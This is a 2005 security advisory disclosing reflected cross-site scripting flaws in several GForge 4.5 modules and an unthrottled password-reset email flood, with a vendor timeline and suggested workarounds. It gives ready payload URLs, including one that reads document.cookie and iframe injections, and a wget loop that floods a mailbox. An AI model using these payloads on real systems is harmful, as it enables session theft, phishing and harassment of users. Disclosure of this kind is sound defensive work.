--------------------------------------------------------------------------- Various Vulnerabilities in GForge --------------------------------------------------------------------------- Author: Jose Antonio Coret (Joxean Koret) Date: 2005 Location: Basque Country --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GForge - 4.5 (Current) GForge has tools to help your team collaborate, like message forums and mailing lists; tools to create and control access to Source Code Management repositories like CVS and Subversion. GForge automatically creates a repository and controls access to it depending on the role settings of the project. Web : http://gforge.org/ --------------------------------------------------------------------------- A) Cross Site Scripting Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1.- In the Forum Module: http://[target]/forum/forum.php?forum_id="><script>alert('hi')</script> http://[target]/forum/forum.php?group_id="><script>alert('hi')</script> (NOTE: The group_id parameter is ALWAYS vulnerable.) 2.- In the Task Module: http://[target]/pm/task.php?func=detailtask&project_task_id="><h1>hi!</h1>&group_id=1&group_project_id=3 3.- In the Snippets Module: http://[target]/snippet/detail.php?type=snippet&id=21"><iframe% 20src=http://www.playboy.com></iframe><font%20size=" 4.- In the search engine: To try it simply enter any valid XSS test such as "><h1>hi!!!</h1> in the search field and press enter or try the following URL: http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21% 3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe% 3E&Search=Search 5.- In other modules: http://[target]//frs/admin/qrs.php?group_id="><script>alert(document.cookie)</script> http://[target]/notepad.php?form=parent;%0d%0a-->%0d% 0a</script><body><h1>hi!</h1></body></html><!-- NOTE: (rows, cols and wrap paremeter are also vulnerables). 6.- In the Login Form: The login form is also vulnerable to XSS (Cross Site Scripting) attacks. This may be used to launch phising attacks by sending HTML e-mails (i.e.: saying that you need to upgrade to the latest GForge version due to a security problem) and putting in the e-mail an HTML link that points to an specially crafted url that inserts an html form in the GForge login page and when the user press the login button, he/she send the credentials to the attackers website. POC. To "play" with this, simply go to the login page and insert in the login field then following text: "><iframe src=http://www.playboy.com></iframe><font size=" B) E-Mail Flood ~~~~~~~~~~~~~~~ The 'forgot your password?' feature allows a remote user to load a certain URL to cause the service to send a validation e-mail to the specified user's e-mail address. There is no limit to the number of messages sent over a period of time, so a remote user can flood the target user's secondary e-mail address. E-Mail Flood, E-Mail bomber. The following is a "Proof Of Concept" of this vulnerability: [joxean@nemobox]$ while [ true ]; do > wget http://[target]/account/lostpw.php?loginname=joxean > done The "pending account" confirmation e-mail is also vulnerable so, a mailicious user can flood any e-mail box even if they are not GForge registered users. The fix: ~~~~~~~~ There is no fix at the moment. Workarounds: ~~~~~~~~~~~~ There are no workarounds except by using a method to automagically catch the XSS request such as WASP (available via CVS at https://savannah.nongnu.org/wasp) or mod_security (available at http://www.modsecurity.org/) for Apache Web Servers. Timeline: ~~~~~~~~~ 25-Apr-2005 Vendor contacted 25-Apr-2005 Initial Vendor response (without interest on fixing bugs) 25-Apr-2005 Response to vendor 04-Jun-2005 One XSS bug (not discovered by me) closed without a fix 23-Jun-2005 Vendor RE-contacted (No response) 27-Jul-2005 Advisory released Disclaimer: ~~~~~~~~~~~ The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------------------------------------------------- Contact: ~~~~~~~~ Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
Attachment:
signature.asc
Description: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada digitalmente